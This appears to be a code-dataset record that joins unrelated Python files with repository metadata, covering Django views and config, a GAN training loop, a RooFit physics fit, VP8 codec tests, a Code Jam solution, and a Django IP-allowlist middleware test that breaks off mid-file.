lyp_login@outlook.com
|
bfa5b4a6470235a489f54741c7f0f9fe574cef1a
|
1c0505803cf4ebe42bd1f6f369c949c35d7a4d5b
|
/ConceptZI/asgi.py
|
24e3f6d0b87254642df1b96f867bea4629215e26
|
[] |
no_license
|
tahirs95/django_stripe_sepa
|
37d6787e0e5cb9e88dea7a94c3edcb07902f6fc1
|
8ed597be78aee9f84569562d4cd187485f750cb4
|
refs/heads/main
| 2023-08-22T19:16:35.786920
| 2021-10-01T16:22:36
| 2021-10-01T16:22:36
| 412,537,848
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
ASGI config for ConceptZI project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ConceptZI.settings")
application = get_asgi_application()
|
[
"tahirs95@hotmail.com"
] |
tahirs95@hotmail.com
|
ed93de707065f2b8a365587714ca37565801df90
|
6d395ffb748ac60733e9a5f039e2a307adae44d4
|
/api/views_dir/xcx/page_group.py
|
ee7abc895b1e88940fd96cd77f904775668ab555
|
[] |
no_license
|
itcastpeng/hzWebSiteApi
|
4f69c0f68dc78eebc4a5dad668d03e3c9d9c1d57
|
f2bcd7a9ef28bf9c7f867e803f35d7b307d25527
|
refs/heads/master
| 2021-03-06T14:26:34.923464
| 2020-03-10T04:07:27
| 2020-03-10T04:07:27
| 246,204,894
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,787
|
py
|
from api import models
from publicFunc import Response
from publicFunc import account
from django.http import JsonResponse
from publicFunc.condition_com import conditionCom
from api.forms.xcx.page_group import SelectForm
import json
# @account.is_token(models.UserProfile)
def page_group(request):
response = Response.ResponseObj()
if request.method == "GET":
forms_obj = SelectForm(request.GET)
if forms_obj.is_valid():
current_page = forms_obj.cleaned_data['current_page']
length = forms_obj.cleaned_data['length']
print('forms_obj.cleaned_data -->', forms_obj.cleaned_data)
order = request.GET.get('order', '-create_datetime')
field_dict = {
'id': '',
'template_id': '',
'name': '__contains',
'create_datetime': '',
}
q = conditionCom(request, field_dict)
print('q -->', q)
objs = models.PageGroup.objects.filter(q).order_by(order)
count = objs.count()
if length != 0:
start_line = (current_page - 1) * length
stop_line = start_line + length
objs = objs[start_line: stop_line]
# 返回的数据
ret_data = []
default_page_id = None
for obj in objs:
# 获取分组下面的页面数据
page_objs = obj.page_set.all()
page_data = []
for page_obj in page_objs:
if not default_page_id:
default_page_id = page_obj.id
page_data.append({
'id': page_obj.id,
'name': page_obj.name
})
# 将查询出来的数据 加入列表
ret_data.append({
'id': obj.id,
'name': obj.name,
'page_data': page_data,
'create_datetime': obj.create_datetime.strftime('%Y-%m-%d %H:%M:%S'),
})
# 查询成功 返回200 状态码
response.code = 200
response.msg = '查询成功'
response.data = {
'ret_data': ret_data,
'data_count': count,
'default_page_id': default_page_id,
}
response.note = {
'id': "页面分组id",
'name': '页面分组名称',
'create_datetime': '创建时间',
}
else:
response.code = 402
response.msg = "请求异常"
response.data = json.loads(forms_obj.errors.as_json())
return JsonResponse(response.__dict__)
|
[
"15531506906@sina.cn"
] |
15531506906@sina.cn
|
467737aa13e6224c2b5459fae510519622e05c84
|
b4c11d69197ef90dcacc8e34884036e4f576855e
|
/Python/myEnvironment/djangoEnv/bin/pilfont.py
|
146697b69ee3a1e8db89379b57baf96f2fd4437e
|
[] |
no_license
|
VT-Zhang/PYTHON_Platform_Works
|
c6314715e207995cce0244c38c8d48f95cf934b8
|
52654ef0ecf9102bfe378540818ebbb2dc27a134
|
refs/heads/master
| 2021-06-15T02:22:03.868898
| 2017-03-07T16:20:26
| 2017-03-07T16:20:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,085
|
py
|
#!/Users/jianzhang/Dropbox/Dojo/Python/myEnvironment/djangoEnv/bin/python2.7
#
# The Python Imaging Library
# $Id$
#
# PIL raster font compiler
#
# history:
# 1997-08-25 fl created
# 2002-03-10 fl use "from PIL import"
#
from __future__ import print_function
import glob
import sys
# drivers
from PIL import BdfFontFile
from PIL import PcfFontFile
VERSION = "0.4"
if len(sys.argv) <= 1:
print("PILFONT", VERSION, "-- PIL font compiler.")
print()
print("Usage: pilfont fontfiles...")
print()
print("Convert given font files to the PIL raster font format.")
print("This version of pilfont supports X BDF and PCF fonts.")
sys.exit(1)
files = []
for f in sys.argv[1:]:
files = files + glob.glob(f)
for f in files:
print(f + "...", end=' ')
try:
fp = open(f, "rb")
try:
p = PcfFontFile.PcfFontFile(fp)
except SyntaxError:
fp.seek(0)
p = BdfFontFile.BdfFontFile(fp)
p.save(f)
except (SyntaxError, IOError):
print("failed")
else:
print("OK")
|
[
"jianz@vt.edu"
] |
jianz@vt.edu
|
5160df22bf339592d41b4ff90b972fa65bcbcd93
|
773c02448ad1766270583cadcbb5c2c71347efd2
|
/T2_img2latent.py
|
0a200f93eb514a9c131e57b12e6605ca580d353a
|
[] |
no_license
|
thoppe/SyntheticCountenance
|
b4640c8009ba5bc2377a11aac88cc1be75d7b92c
|
c06e186fb0596a50d9080b38b80d81c58f2bdde4
|
refs/heads/master
| 2020-04-14T19:36:12.431157
| 2019-02-02T22:05:20
| 2019-02-02T22:05:20
| 164,064,092
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,142
|
py
|
"""
The idea is to find the img such that D(img) is minimized, that is the picture
that _most_ fools the discriminator.
"""
import numpy as np
import os, json, glob, random, h5py
from tqdm import tqdm
import tensorflow as tf
from src.GAN_model import GAN_output_to_RGB, RGB_to_GAN_output
from src.img2latent import Image2Latent
def image_pipeline(batch_size=5):
f_h5 = 'samples/PGAN_small_images.h5'
with h5py.File(f_h5, 'r') as h5:
N = len(h5['Z'])
Z = h5['Z'][...]
while True:
idx = np.random.randint(0, N, size=batch_size)
img = np.array([h5['IMG'][i] for i in idx])
img = RGB_to_GAN_output(img, batch_size=batch_size, resize=False)
yield Z[idx], img
if __name__ == "__main__":
batch_size = 32
n_epochs = 2000
n_save_every = 50
ITR = image_pipeline(batch_size)
clf = Image2Latent(batch_size=batch_size)
while True:
for n, (z,img) in enumerate(ITR):
if n%n_save_every == 0:
clf.render(z, img)
#s = clf.save()
lx = clf.train(z, img)
print(n, lx)
|
[
"travis.hoppe@gmail.com"
] |
travis.hoppe@gmail.com
|
83c5bdc03f15bf3062de8e162dc37d0640411c79
|
71c7683331a9037fda7254b3a7b1ffddd6a4c4c8
|
/Phys/BsKstKst/python/BsKstKst/FitMassAngles/Param_Diego/for_Juan.py
|
c5a03c629416915abae29c06369469f6b4fd23be
|
[] |
no_license
|
pseyfert-cern-gitlab-backup/Urania
|
edc58ba4271089e55900f8bb4a5909e9e9c12d35
|
1b1c353ed5f1b45b3605990f60f49881b9785efd
|
refs/heads/master
| 2021-05-18T13:33:22.732970
| 2017-12-15T14:42:04
| 2017-12-15T14:42:04
| 251,259,622
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,717
|
py
|
from ROOT import *
from math import *
from array import *
from Urania import PDG
from Urania.Helicity import *
from Urania import RooInterfaces as D
# Generate the pdf using the tools in Urania.Helicity
A = doB2VX([0,1,2], helicities = [0], transAmp = 1)#0)
### masage a bit the expression to make it more suitable for fitting
pdf_split = DecomposeAmplitudes(A,TransAmplitudes.values())#H.values())
pdf_delete = {}
ape = TransAmplitudes["1_pe"]
a_s = TransAmplitudes["0_0"]
for ak in TransAmplitudes.values():
if ape==ak: continue
if a_s==ak: continue
_re, _im = TermsAsReImag(A,ak,ape)
pdf_delete[re(ak*ape.conjugate())]=_re
pdf_delete[im(ak*ape.conjugate())]=_im
pdf_delete[re(ape*ak.conjugate())]=_re
pdf_delete[im(ape*ak.conjugate())]=_im
phys = 0
for key in pdf_split:
if key in pdf_delete.keys():
print "deleting ",key
continue
phys += StrongPhases(key)*pdf_split[key]
### change the free variables to cosines
x = Symbol("helcosthetaK",real = True)
y = Symbol("helcosthetaL", real = True)
z = Symbol("helphi", real = True)
CThL = Cos(ThetaL)
CThK = Cos(ThetaK)
def changeFreeVars(function):
function = function.subs( Sin(2*ThetaK), 2*Sin(ThetaK)*Cos(ThetaK) )
function = function.subs( Cos(2*ThetaK), Cos(ThetaK)**2 - Sin(ThetaK)**2)
function = function.subs( Sin(2*ThetaL), 2*Sin(ThetaL)*Cos(ThetaL) )
function = function.subs( Cos(2*ThetaL), Cos(ThetaL)**2 - Sin(ThetaL)**2)
function = function.subs( Sin(ThetaK), Sqrt(1-Cos(ThetaK)**2))
function = function.subs( Sin(ThetaL), Sqrt(1-Cos(ThetaL)**2))
function = function.subs([(CThK,x),(CThL,y), (Phi,z)])
return function
func = changeFreeVars(phys)
c1_th1 = Symbol("c1th1",real=True)
c2_th1 = Symbol("c2th1",real=True)
c3_th1 = Symbol("c3th1",real=True)
c4_th1 = Symbol("c4th1",real=True)
y_th1 = Symbol("yth1",real=True)
c1_th2 = Symbol("c1th2",real=True)
c2_th2 = Symbol("c2th2",real=True)
c3_th2 = Symbol("c3th2",real=True)
c4_th2 = Symbol("c4th2",real=True)
y_th2 = Symbol("yth2",real=True)
acc_coefs = [c1_th1,c2_th1,c3_th1,c4_th1,y_th1,c1_th2,c2_th2,c3_th2,c4_th2,y_th2]
c5_th1 = y_th1-(1+c1_th1+c2_th1+c3_th1+c4_th1)
c5_th2 = y_th2-(1+c1_th2+c2_th2+c3_th2+c4_th2)
acc1 = 1 + c1_th1*x + c2_th1*x*x + c3_th1*x*x*x + c4_th1*x*x*x*x + c5_th1*x*x*x*x*x
acc2 = 1 + c1_th2*y + c2_th2*y*y + c3_th2*y*y*y + c4_th2*y*y*y*y + c5_th2*y*y*y*y*y
# func = func*acc1*acc2
##### Generate and compile a fitting class corresponding to "func"
### Trial 1, w/o analytical integrals
op = D.RooClassGenerator(func*acc1*acc2, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"AngularPDFAcc_2011")
# op = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values(),"AngularPDFNoAcc")
op.makePdf(integrable = kTRUE) ## You can also use makeFunc to generate just a RooAbsReal. Still not tested though
op.doIntegral(1,(x,-1,1))
op.doIntegral(2,(y,-1,1))
op.doIntegral(3,(z,-Pi,Pi))
op.doIntegral(4,(x,-1,1),(y,-1,1))
op.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
op.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
op.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
op.overwrite()
### Trial 2, now lets generate a version using analytical integrals
# op2 = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"RooSecond")
# op2.makePdf(integrable = kTRUE)
# op2.doIntegral(1,(x,-1,1))
# op2.doIntegral(2,(y,-1,1))
# op2.doIntegral(3,(z,-Pi,Pi))
# op2.doIntegral(4,(x,-1,1),(y,-1,1))
# op2.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
# op2.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
# op2.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
# op2.overwrite()
### Compile online the two models and load the class to python
op.invoke()#, op2.invoke()
BREAK
gROOT.ProcessLine(".x RooSecond.cxx+")
############## MAKING TREE
plot = 1
label = 'PLOT'
f = TFile("${WHOME}/NTuples_Bs2KstKst_strip17/public/Bs2KstKst_generated_MC11_angles.root")
tree=f.Get("T")
f1=TFile("/tmp/trash.root","recreate")
tree1 = tree.CopyTree("1")
tree2 = tree.CopyTree("1")
################### CONSTRUCTING THE MODEL
CThetaL = RooRealVar("CosTheta1","cos(ThetaL) ", -1,1)
CThetaK = RooRealVar("CosTheta2","cos(ThetaK) ", -1,1)
Phi = RooRealVar("Phi","Phi", -pi,pi)
A0 = RooRealVar("A0","A0",0.77,0.5,1.)
Apa = RooRealVar("Apa","Apa",0.5,0.3,1.)
As = RooRealVar("As" ,"As" ,1/2,0.,1.)
Ape = RooFormulaVar("Ape","Ape","sqrt(1-As*As-Apa*Apa-A0*A0)",RooArgList(A0,As,Apa))
deltaPa = RooRealVar("deltaPa","deltaPa",2.501,0.,2*pi)
deltaPe = RooRealVar("deltaPe","deltaPe",0.)#1, -pi,pi)
deltaS = RooRealVar("deltaS" ,"deltaS" ,0.9,0.,2*pi)
model=RooFirst("model","model",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPe,deltaS)
# model2=RooSecond("model2","model2",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPepi,deltaS)
################### FITTING DATA
### tree - mix of B & Bbar
### tree1 - K+
### tree2 - K-
data = RooDataSet(label, label,tree1,RooArgSet(CThetaL,CThetaK,Phi))
#data = model.generate(RooArgSet(CThetaL,CThetaK,Phi),100000) ;
As.setVal(0)
As.setConstant(kTRUE)
deltaS.setConstant(kTRUE)
#deltaPe.setConstant(kTRUE)
def test(model,cv):
res = model.fitTo(data,RooFit.Minos(kTRUE))#, RooFit.Range("REDUCED"))
cv.Divide(2,2)
cv.cd(1)
Angframe = CThetaK.frame()
data.plotOn(Angframe)
model.plotOn(Angframe)
Angframe.Draw()
cv.cd(2)
Angframeb = CThetaL.frame()
data.plotOn(Angframeb)
model.plotOn(Angframeb)
Angframeb.Draw()
cv.cd(3)
Angframec = Phi.frame()
data.plotOn(Angframec)
model.plotOn(Angframec)
Angframec.Draw()
return res, Angframe, Angframeb, Angframec
cv = TCanvas()
w_1 = test(model,cv)
# w_2 = test(model2)
################ DRAWING
|
[
"liblhcb@cern.ch"
] |
liblhcb@cern.ch
|
c48e575ae1fb8a2c929db8e5ce19ddf8a1db5e42
|
989b3499948137f57f14be8b2c77d0610d5975e6
|
/python-package/daily_study/python/question_python(resolved)/chapter4_conditional_and_loops(완결)/iii_five_seven.py
|
978209ab4157d0feb585ee846dc3b32fb9719737
|
[] |
no_license
|
namkiseung/python_BasicProject
|
76b4c070934ad4cb9d16ce844efa05f64fb09ac0
|
460d05248b2d1431624aba960e28bece888643e4
|
refs/heads/master
| 2022-12-13T21:12:06.865241
| 2020-04-23T01:30:08
| 2020-04-23T01:30:08
| 142,980,920
| 1
| 1
| null | 2022-12-08T02:27:40
| 2018-07-31T07:49:17
|
Python
|
UTF-8
|
Python
| false
| false
| 838
|
py
|
# -*- coding: utf-8 -*-
def five_seven(x, y):
""" 전달 받은 두 수(경계 모두 포함)의 범위에서 7로 나눠지면서, 5의 배수인 수의 목록을 "," 로 구분한 문자열로 반환하는 함수를 작성하자
sample in/out:
five_seven(1500, 1600) -> "1505, 1540, 1575"
five_seven(1500, 1700) -> "1505, 1540, 1575, 1610, 1645, 1680"
"""
# 여기 작성
result = ''
# x부터 y 사이 숫자중
for num in range(x, y+1):
if num % 7 == 0 and num % 5 == 0:
result ='',num
print num
else:
continue
# 만약 x가 7로 나누었을때 나머지 0
#만약 x가
return 'success'
if __name__ == "__main__":
print five_seven(1500, 1600)
print five_seven(1500, 1700)
pass
|
[
"rlzld100@gmail.com"
] |
rlzld100@gmail.com
|
0ac4e38308fb4ff518727b8ee1195fa098b9eb57
|
9a94357b2cc45b1e6a56c5c309fad0f717e96b2b
|
/tests/test_vpx.py
|
108360a809ec883ab5d5c6b8521ffbd7c1e719a3
|
[
"BSD-3-Clause"
] |
permissive
|
gitter-badger/aiortc
|
34099aee833a56d36f53b74336a2e7344d274cf3
|
0417b6b9c75dd4fc9f049ddeda7f09f306318574
|
refs/heads/master
| 2020-03-30T11:22:22.704701
| 2018-10-01T12:49:46
| 2018-10-01T13:16:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,489
|
py
|
from unittest import TestCase
from aiortc.codecs import get_decoder, get_encoder
from aiortc.codecs.vpx import (Vp8Decoder, Vp8Encoder, VpxPayloadDescriptor,
_vpx_assert, number_of_threads)
from aiortc.mediastreams import VIDEO_TIME_BASE, VideoFrame
from aiortc.rtcrtpparameters import RTCRtpCodecParameters
from .codecs import CodecTestCase
VP8_CODEC = RTCRtpCodecParameters(name='VP8', clockRate=90000)
class VpxPayloadDescriptorTest(TestCase):
def test_no_picture_id(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x10')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x10')
self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=None)')
self.assertEqual(rest, b'')
def test_short_picture_id_17(self):
"""
From RFC 7741 - 4.6.3
"""
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x11')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 17)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x11')
self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=17)')
self.assertEqual(rest, b'')
def test_short_picture_id_127(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x7f')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 127)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x7f')
self.assertEqual(rest, b'')
def test_long_picture_id_128(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x80\x80')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 128)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x80\x80')
self.assertEqual(rest, b'')
def test_long_picture_id_4711(self):
"""
From RFC 7741 - 4.6.5
"""
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x92\x67')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 4711)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x92\x67')
self.assertEqual(rest, b'')
def test_tl0picidx(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\xc0\x92\x67\x81')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 4711)
self.assertEqual(descr.tl0picidx, 129)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\xc0\x92\x67\x81')
self.assertEqual(rest, b'')
def test_tid(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x20\xe0')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, (3, 1))
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x20\xe0')
self.assertEqual(rest, b'')
def test_keyidx(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x10\x1f')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, 31)
self.assertEqual(bytes(descr), b'\x90\x10\x1f')
self.assertEqual(rest, b'')
class Vp8Test(CodecTestCase):
def test_assert(self):
with self.assertRaises(Exception) as cm:
_vpx_assert(1)
self.assertEqual(str(cm.exception), 'libvpx error: Unspecified internal error')
def test_decoder(self):
decoder = get_decoder(VP8_CODEC)
self.assertTrue(isinstance(decoder, Vp8Decoder))
def test_encoder(self):
encoder = get_encoder(VP8_CODEC)
self.assertTrue(isinstance(encoder, Vp8Encoder))
frame = VideoFrame(width=640, height=480)
frame.pts = 0
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 0)
# change resolution
frame = VideoFrame(width=320, height=240)
frame.pts = 3000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 3000)
def test_encoder_large(self):
encoder = get_encoder(VP8_CODEC)
self.assertTrue(isinstance(encoder, Vp8Encoder))
# first keyframe
frame = VideoFrame(width=2560, height=1920)
frame.pts = 0
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 7)
self.assertEqual(len(payloads[0]), 1300)
self.assertEqual(timestamp, 0)
# delta frame
frame = VideoFrame(width=2560, height=1920)
frame.pts = 3000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 3000)
# force keyframe
frame = VideoFrame(width=2560, height=1920)
frame.pts = 6000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame, force_keyframe=True)
self.assertEqual(len(payloads), 7)
self.assertEqual(len(payloads[0]), 1300)
self.assertEqual(timestamp, 6000)
def test_number_of_threads(self):
self.assertEqual(number_of_threads(1920 * 1080, 16), 8)
self.assertEqual(number_of_threads(1920 * 1080, 8), 3)
self.assertEqual(number_of_threads(1920 * 1080, 4), 2)
self.assertEqual(number_of_threads(1920 * 1080, 2), 1)
def test_roundtrip_1280_720(self):
self.roundtrip_video(VP8_CODEC, 1280, 720)
def test_roundtrip_960_540(self):
self.roundtrip_video(VP8_CODEC, 960, 540)
def test_roundtrip_640_480(self):
self.roundtrip_video(VP8_CODEC, 640, 480)
def test_roundtrip_320_240(self):
self.roundtrip_video(VP8_CODEC, 320, 240)
|
[
"jeremy.laine@m4x.org"
] |
jeremy.laine@m4x.org
|
b2e1e547eb7cb40072a470450961ec3ea2a10584
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_118/652.py
|
4beb500f3c8a4122fb591a82efec72a0653e53da
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,386
|
py
|
n = int(raw_input())
for c in range(n):
(A,B) = (int(r) for r in raw_input().split(' '))
L = len(str(B))
ans = []
out = 0
# The odd ones out
for v in (1,4,9):
if A <= v <= B:
ans.append(v)
out += 1
# Twos
for d in range(L/2+2):
s = '2'+'0'*d+'2'
sq = int(s)**2
#print s,sq
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
for d in range(L/4+2):
s = '2'+'0'*d+'1'+'0'*d+'2'
sq = int(s)**2
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
# Binary
p = [0,0,0,0,0]
beg = set()
for p[0] in range(L/4+2):
for p[1] in range(min(p[0],L/4+1),L/4+2):
for p[2] in range(min(p[1],L/4+1),L/4+2):
for p[3] in range(min(p[2],L/4+1),L/4+2):
for p[4] in range(min(p[3],L/4+1),L/4+2):
s = ['0'] * (L/4+1)
for pos in range(5):
if p[pos] < (L/4+1): s[p[pos]] = '1'
a = ''.join(s)
a = a[(a+'1').find('1'):]
beg.add(a)
for b in beg:
if b:
if sum([int(u) for u in b]) >= 5: continue
rev = [b+b[::-1],b+'0'+b[::-1],b+'1'+b[::-1],b+'2'+b[::-1]]
for v in rev:
v2 = int(v)**2
s = str(v2)
if A <= v2 <= B and s == s[::-1]: out += 1
if A <= v2 <= B and s == s[::-1]: ans.append(v2)
print "Case #%d: %d" % (c+1,out)
#y = len(list(set(range(A,B+1)).intersection(set([1,4,9,121,484]))))
#print A,B, ans
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
95cd4d519c8b65d09a90e0a1a1ab1db1c5e65090
|
b677894966f2ae2d0585a31f163a362e41a3eae0
|
/ns3/pybindgen-0.17.0.post57+nga6376f2/tests/boost/wscript
|
575c486512db2596263726622d81756947c7266d
|
[
"LGPL-2.1-only",
"Apache-2.0"
] |
permissive
|
cyliustack/clusim
|
667a9eef2e1ea8dad1511fd405f3191d150a04a8
|
cbedcf671ba19fded26e4776c0e068f81f068dfd
|
refs/heads/master
| 2022-10-06T20:14:43.052930
| 2022-10-01T19:42:19
| 2022-10-01T19:42:19
| 99,692,344
| 7
| 3
|
Apache-2.0
| 2018-07-04T10:09:24
| 2017-08-08T12:51:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,018
|
## -*- python -*-
#from waflib import Task
import sys
import os.path
import os
import subprocess
# uncomment to enable profiling information
# epydoc uses the profile data to generate call graphs
#os.environ["PYBINDGEN_ENABLE_PROFILING"] = ""
if 0:
DEPRECATION_ERRORS = '-Werror::DeprecationWarning' # deprecations become errors
else:
DEPRECATION_ERRORS = '-Wdefault::DeprecationWarning' # normal python behaviour
def build(bld):
env = bld.env
env['TOP_SRCDIR'] = bld.srcnode.abspath()
bindgen = bld(
features='command',
source='barmodulegen.py',
target='barmodule.cc',
command='${PYTHON} %s ${SRC[0]} ${TOP_SRCDIR} > ${TGT[0]}' % (DEPRECATION_ERRORS,))
if env['CXX'] and env['ENABLE_BOOST_SHARED_PTR'] == True:
obj = bld(features='cxx cxxshlib pyext')
obj.source = [
'bar.cc',
'barmodule.cc'
]
obj.target = 'bar'
obj.install_path = None
obj.env.append_value("INCLUDES", '.')
|
[
"you@example.com"
] |
you@example.com
|
|
2aea9148c27a7fbf9f644d8c40edb2525fad701b
|
dd483c380c93edb21dae4cb0cb082ba0bfeb3e6a
|
/app/src/apps/stats/topological_stat/views.py
|
7c0caf2793ef1aa6e631cff093ebcec9992ed96e
|
[] |
no_license
|
BarbaraDiazE/D_Peptide_Builder
|
7aa4647c9b0ce20d8a258834d0dffaf21e368224
|
d47e29e0b9e55bd6e520bc9caf7d362e796d458d
|
refs/heads/master
| 2020-04-25T02:29:03.092694
| 2019-02-25T20:43:19
| 2019-02-25T20:43:19
| 172,440,859
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 546
|
py
|
from rest_framework.views import APIView
from django.http import HttpResponse
from django.shortcuts import render, render_to_response
import pandas as pd
import os
import glob
from .compute_topological import statTOPOLOGICAL
class TOPOLOGICALView(APIView):
def get(self, request):
csv_name = request.session['csv_name']
stat = statTOPOLOGICAL(csv_name)
stat_topological_html = stat.resolve()
context = {'loaded_data': stat_topological_html}
return render(request, 'stats_topological.html', context)
|
[
"debi_1223@hotmail.com"
] |
debi_1223@hotmail.com
|
1908f8673019ee60a62183f9409a6ca86cd08649
|
358519772669c73092f625f630722c38e1d33783
|
/ctools/Testing/Types/ImproperDihedral2Type.py
|
3855f86040c5114b8995f4d188699f85bb2a3205
|
[] |
no_license
|
minghao2016/mmtools
|
e7e61aca084498408ceae965dd6c9450ad89eafa
|
3ade988afb51cd54ee5a4067d8deaad88afbb0fe
|
refs/heads/master
| 2021-09-21T01:02:22.522187
| 2014-09-19T03:40:03
| 2014-09-19T03:40:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 557
|
py
|
import sys
sys.path.append('..')
from Decorators import *
from Types.AbstractDihedralType import *
class ImproperDihedral2Type(AbstractDihedralType):
@accepts_compatible_units(None,
None,
None,
None,
None,
units.degrees,
units.kilojoules_per_mole * units.radians**(-2))
def __init__(self, atom1, atom2, atom3, atom4, type, xi, k):
"""
"""
AbstractDihedralType.__init__(self, atom1, atom2, atom3, atom4, type)
self.xi = xi
self.k = k
|
[
"choderaj@mskcc.org"
] |
choderaj@mskcc.org
|
76685f23ac80025d9fc64fa03036df7c4bbdbbbe
|
485816a0a8b86818e4f2cefec517e6316e2252d6
|
/posthog/test/test_middleware.py
|
e7bd0e8275c8ba6c3d46790e80193e5a60a215f4
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
abhijitghate/posthog
|
3647443274aee6431e7fecf6902644a9fa7eb9d8
|
68dc4d2730600efb00d3708fb7fba70d85612760
|
refs/heads/master
| 2023-04-19T15:17:25.033992
| 2021-05-13T09:48:59
| 2021-05-13T09:48:59
| 279,130,099
| 1
| 0
|
MIT
| 2020-07-12T19:04:15
| 2020-07-12T19:04:14
| null |
UTF-8
|
Python
| false
| false
| 6,775
|
py
|
from django.conf import settings
from rest_framework import status
from posthog.test.base import APIBaseTest
class TestAccessMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_ip_range(self):
"""
Also test that capture endpoint is not restrictied by ALLOWED_IP_BLOCKS
"""
with self.settings(ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25", "128.0.0.1"]):
# not in list
response = self.client.get("/", REMOTE_ADDR="10.0.0.1")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="10.0.0.1",)
self.assertEqual(
